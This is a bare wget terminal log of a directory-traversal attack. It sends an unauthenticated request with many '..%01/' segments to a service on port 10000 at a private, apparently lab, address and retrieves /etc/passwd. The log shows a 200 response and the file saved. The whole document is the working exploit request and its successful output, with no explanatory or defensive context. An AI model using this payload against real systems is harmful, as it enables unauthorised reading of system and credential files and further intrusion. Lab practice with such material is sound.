--2022-12-08 19:25:44--  http://10.0.2.15:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01//etc/passwd
Connecting to 10.0.2.15:10000... connected.
HTTP request sent, awaiting response... 200 Document follows
Length: 1945 (1.9K) [text/plain]
Saving to: ‘passwd.1’

     0K .                                                     100%  195M=0s

2022-12-08 19:25:44 (195 MB/s) - ‘passwd.1’ saved [1945/1945]

